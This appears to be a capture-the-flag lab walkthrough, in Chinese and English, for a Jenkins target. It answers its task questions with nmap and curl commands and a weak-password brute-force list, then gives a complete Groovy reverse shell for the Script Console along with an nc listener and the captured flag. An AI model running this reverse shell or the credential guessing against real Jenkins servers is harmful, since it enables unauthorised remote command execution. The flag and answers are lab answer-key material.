Important

Jenkins是一个用于自动化构建、测试和部署软件项目的开源持续集成和持续部署（CI/CD）工具。它允许开发团队自动执行和监控在软件开发过程中的重复性任务，例如构建代码、运行测试、部署应用程序等。Jenkins提供了一个易于使用的Web界面，可以配置各种任务和工作流，并通过插件系统扩展其功能，以满足不同团队和项目的需求。Jenkins的灵活性和可扩展性使其成为许多开发团队的首选工具，用于构建和交付高质量的软件。

Task 1

What does the acronym CVE stand for?

(CVE的全称?)

Common Vulnerabilities and Exposures

Task 2

What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

(在网络安全中CIA分别代表什么意思？)

Confidentiality, Integrity, Availability

Task 3

What is the version of the service running on port 8080?

(8080端口上运行的服务版本是多少?)

# nmap -sC -sV 10.129.141.102 -p 8080

Jetty 9.4.39.v20210325

Task 4

What version of Jenkins is running on the target?

(服务端运行的Jenkins是哪个版本？)

$ curl "http://10.129.141.102:8080/error" | grep "version"

或则访问页面

2.289.1

Task 5

What type of script is accepted as input on the Jenkins Script Console?

(在Jenkins脚本控制台,输入的是什么类型的脚本？)

Burp 爆破

-username-
admin
root
test
guest

-password-
admin123
root
password
qwerty123

Groovy

Task 6

What would the “String cmd” variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

(如果目标虚拟机正在运行 Windows，那么 Groovy 脚本片段中的 ‘String cmd’ 变量将等于什么？)

cmd.exe

Task 7

What is a different command than “ip a” we could use to display our network interfaces’ information on Linux?

(除了 ‘ip a’ 命令外，我们还可以使用哪个命令在 Linux 上显示网络接口的信息？)

ifconfig

Task 8

What switch should we use with netcat for it to use UDP transport mode?

(netcat用什么选项可以用udp传输)

-u

Task 9

What is the term used to describe making a target host initiate a connection back to the attacker host?

(受害者反向连接攻击者主机,那么这个是什么专业术语)

reverse shell

Flag

nc监听10032端口

$ nc -lvnp 10032

反向shell脚本

String host="{your_IP}";
int port=10032;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed())
{while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try
{p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

到Dashboard->Manage Jenkins->Script Console

9cdfb439c7876e703e307864c9167a15